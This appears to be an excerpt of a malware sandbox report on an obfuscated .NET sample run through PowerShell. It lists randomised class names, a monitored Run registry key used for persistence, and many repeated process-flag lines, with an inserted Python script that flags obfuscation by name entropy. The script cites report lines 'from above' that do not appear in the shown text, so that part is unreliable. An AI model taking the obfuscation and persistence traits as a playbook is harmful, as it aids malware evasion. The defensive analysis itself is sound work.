Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, HSVnbciCbEspA5qeJHR9bJSsZnPWuo0GrZXu7MR1gBQLksXwzFXzWWgcApgGUgNKiWg0pwlEuNF.cs High entropy of concatenated method names: '_2q4wpPRfaVhr0exnXH7y891APAO7HbKET96GKYxGsofSr6nSYQvElSnVQzd4FzDKrH30YbalY8L', 'aWKN8JgTw7OsnLqijS1G2FSf5lKyN1BzTceUS7AusrlZE4LOpgaXcu1Wuwzk1u0fNisdvfs1qDN', 'FJHVAMux3eOse32NPNrYghB0J9OilS0b1VXxCJDJh6FXmI8aBAEjaNpxaC2kopUIxwHOIGv955L', 'jGfRxrKXNpeTM8YO7QPoRJmjQ2fPzxvsBjNLD', 'kZ9PmGZma9rdlqmPKpJGfpPr2H3r8JkUX7S1I', 'AQhlQ1kzIc9Ef2keyCUXapmb3OGi6FTBB2Kva', 'bwp4xqBSAhOIzAidlh3oJJvRivoyrO2AeizFi', 't4NvZMrcVrH5QwGjkdYgS8T6KKd876mvUUikN', 'THXyLh0AdRiaDLkYYQVt4gIf6aGSl2TGIZ0Hv', 'AT1vYmitOvIzOWbQZzZiuTU12J3PiZKXYnxiA'
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, gildzzqZDUhVh9QqVcNCwIQO9VGswVHvAI48i1FwSTQKMhjwHZjIW9mdwJ3y.cs High entropy of concatenated method names: 'QVEVDhViI9Msxtf3rvGnQiMgFCItcS0p5D6Z1BTCpo5f6Fde2LisyMtpWmRG', 'N4FYw4dMKIlrkiRxPMqNSNPXd3XzaB2on7k6EPgYotmrpL1DJJT6s4bQ0Jpi', '_1lKSstulGZhXYINkaQd9Asdnrsvcni39pRvUFDpwycuW4xpMqX4hS77iXc6K', 'PNFvO7d1Mi2IWzxMtx1zqm34FyxGrUWwyLxwiGmyaWGVEehy9D6hxvHM1wdE', 'NzfmYhAUGceMKW0mjLzHPddnDgqRRmTH0j9pDfOYWD2DRetXvurMj6Mnbf7d', 'xt4khGVNTHDEWpsI1gYgYvoJk7rms4Vqp4A1OuJJVHK8d5oZr1gtEs3Mjthp', 'zmLy2I6ntM2aqhLCLWxvECHOzvQIBQMbMZRkop6htT9CZiCpf1AwaOdoxGnL', 'lGU48PAY736gsQX2viMog6499aYSQjosLWQRnL6JHFF67P95LEO7pVqTOpjP', 'tWcbDFC14xGh0OYdfNzCiUkAdgC4GkZEk3fcvvyC27fsgUEboKucKM0JQCNsUm0dx4Ht2O9GEH5iHMX42Oi6Tya6c44Z', '_74dfJY6UAxv3WrBFrcQeFUKJoMxCX21o0QCYxD66ZQnhM3Ecq9rhBxcB8PaVyrqjY8AQ0yV0nFGhMbW1o118n5tdEMW0'
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, eTjxx5sBsv0TQY2QsBukke7xGuRK5Vrnm4Vc7A6o9H3gWnlfVttPzqM2XIgnZsx9KoT8nFv5wwqNH0KJaX9HbOIURT9H.cs High entropy of concatenated method names: 'MqoWDQphzr8fvnkIH9zEEDcDy7t0zalckB2FahnIxepzgPAMJUZvXj5AyxTxgsTptxlaeKuQhZNQ652tx2KfrWb4jegt', '_39p79IiNTKU0DvuMDijBA51wmgQCy8uNaqsmM', 'VTi9WoIpssJGUPzXMbuMCGF0hZYIeuMphrb9F', 'iVslLiCsMBZl1LzuhzFMYBpuQXVYU9MiwNoac', 'Tmceex3fvKsJkAkUdbAOatlNKDEvt7aWE2OZV'
Source: 0.2.powershell.exe.1ee60275c50.0.raw.unpack, LG1L2T5n8vBSO4Dc4B2U6DqXmFQQMeofgjzcWBgDvgLe6zjhcZQuAlRgzGt1yUyiDgQ1zAPZRXE.cs High entropy of concatenated method names: 'czdLIkkJGHePbv60eOuYeyQebTWkxLQxtIBDozzTkzeHjwvF0iZ9WLXSXldzQJva2vLFfWmskZn', 'j4gQD94PHOIvfqwgF8eMCnFm32o0IB5Ap5qxVVZaFRLKmaLwc0kz81j2suIyuSG55aCfkON107y', 'K6lV2zL7a7baiNZWYLV0Pa7uhSeNElH68zllWH3k55hqCfKpRoNiazcpVFJa', '_3pqyNrhtv7CmhWTfIKaVxCTfMxlC4kt3daOpdYBPiciiKcXwK1tRoUER3QN3', 'jxIHzBWZPIwWF5Me16RXKy5D4q8hbHjIdITEMMSQOScHVlETgFjWzxFrMe5o', 'rgHuZwYDAVkDNu5fiQGgpbr60XJ1IwMKjiCWFJ4F1RAlRxZyaVrVBTTv5GYA', 'zv9n71pQ0f50PGPzTuOQ3EzQE9qjMl5Z2yV4UK950JFaZNBxHTG4HgTd1jZ6', '_5jeSQ3EJhe2fy9ifCjr5hanazmLriQS1eJsXevXq9vWo9BtzOTy0qlNTrwXI', 'yDpWKuZ7sOl8dZSwzdYBzBedzlS61vlzsjKG7qtZRtuBOZBV1zTFKonJ80td', '_4QkPUIxQHkmMssVmBG2fIN5OOjEuP5kl4bcy3jjLl4JdQehPZIYuCigGsUp8'
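The "High entropy of concatenated method names" findings above come from a simple heuristic: a .NET obfuscator has renamed the members of each class to long random alphanumerics, so the Shannon entropy of the joined names is far higher than that of natural identifiers. The 0mxMq... class shows the weak spot of a pure entropy check: it keeps inherited members such as Equals, GetHashCode and ToString, which dilute the entropy of the concatenation, so a second signal, the share of names that look machine-generated, is worth computing alongside. The script below is an added example, not the sandbox's implementation: it parses the report's own finding lines (two copied verbatim from above, one constructed control in the same shape for an unobfuscated class) and scores each class. The thresholds are assumptions for illustration, not values used by Joe Sandbox.

```python
import math
import re
from collections import Counter

# Two lines copied verbatim from the Data Obfuscation findings above, plus one
# constructed control line in the same format for a class with ordinary names.
REPORT_LINES = [
    "Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, yjkGtRHmIr9nPMZAlUbnH0cde9vCK7hK4CidYwTMrnIK9GNfl4tjltK4xQpIIbioCitLSAUMywv.cs High entropy of concatenated method names: 'GzuVwKUZhkX5MaCXS8tELiub2rzA1ABgbXvI4', 'oXpRvTFzCDMB9YdUHEyjFlV0N0YfeW9OJukeK', 'sh0DBD1NjSGAqZVBWAtzcy7TbplyMhoGUfRdG', 'MPt9bvo6JSjfeajadh10xlBrVCyhXGmiVK0rc'",
    "Source: 0.2.powershell.exe.1ee5f4509a0.2.raw.unpack, 0mxMqJmDRkOT353B3lVUMBD9Gejx6UE7bcw8cMUdm3.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'vBcnqg8Bxc612p2B1u3aTcQIPqiV5yrAPbgFT', 'kTfYaHyir2gb88jHa1xDDJOquMyuUmtAsRHRV', 'XxvYgezFFU8AxmQlcN8rTw2L9iLIPa6bPfCOZ', 'MvQTtw3McXFYFf0jea0HcJrIp99lPddWKFt98'",
    # constructed control: same line shape, unobfuscated class
    "Source: constructed.unpack, ConfigReader.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Dispose', 'Initialize', 'ReadConfig', 'Connect'",
]

ENTROPY_THRESHOLD = 5.0       # bits per character; assumed cut-off, not the sandbox's
RANDOM_RATIO_THRESHOLD = 0.3  # share of random-looking names; assumed cut-off

LINE_RE = re.compile(r", (?P<cls>\S+)\.cs High entropy of concatenated method names: (?P<names>.*)$")
# Obfuscator output: 20+ alphanumerics mixing upper, lower and digits, optional
# leading underscore (C# mangling for names that would start with a digit).
RANDOM_NAME_RE = re.compile(r"^_?(?=.*[a-z])(?=.*[A-Z])(?=.*\d)[A-Za-z0-9]{20,}$")


def parse_report_line(line):
    """Return (class name, [method names]) from one sandbox finding line."""
    m = LINE_RE.search(line)
    if not m:
        raise ValueError("not a method-name finding: " + line[:60])
    names = re.findall(r"'([^']*)'", m.group("names"))
    return m.group("cls"), names


def shannon_entropy(text):
    """Shannon entropy in bits per character of the character distribution of text."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def random_name_ratio(names):
    """Fraction of names matching the obfuscator's naming pattern."""
    if not names:
        return 0.0
    return sum(1 for name in names if RANDOM_NAME_RE.match(name)) / len(names)


def assess(names):
    """Score one class; either signal above its threshold marks it obfuscated."""
    entropy = shannon_entropy("".join(names))
    ratio = random_name_ratio(names)
    return {
        "entropy": entropy,
        "random_ratio": ratio,
        "obfuscated": entropy >= ENTROPY_THRESHOLD or ratio >= RANDOM_RATIO_THRESHOLD,
    }


def assess_report(lines):
    """Map class name -> assessment for every finding line given."""
    return {cls: assess(names) for cls, names in map(parse_report_line, lines)}


if __name__ == "__main__":
    for cls, r in assess_report(REPORT_LINES).items():
        print(f"{cls[:24]:24} H={r['entropy']:.2f} random={r['random_ratio']:.2f} obfuscated={r['obfuscated']}")
```

On the two report lines the yjkG... class scores about 5.7 bits per character with every name random-looking, while the 0mxMq... class is caught by the name-pattern ratio (4 of 10) even though its inherited members pull the entropy down; the constructed control class scores about 4.4 bits and is left alone. When running this over your own decompiled output rather than report lines, feed the per-class member lists straight into assess.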

Boot Survival

barindex
Source: C:\Windows\System32\conhost.exe Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (78 occurrences) Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
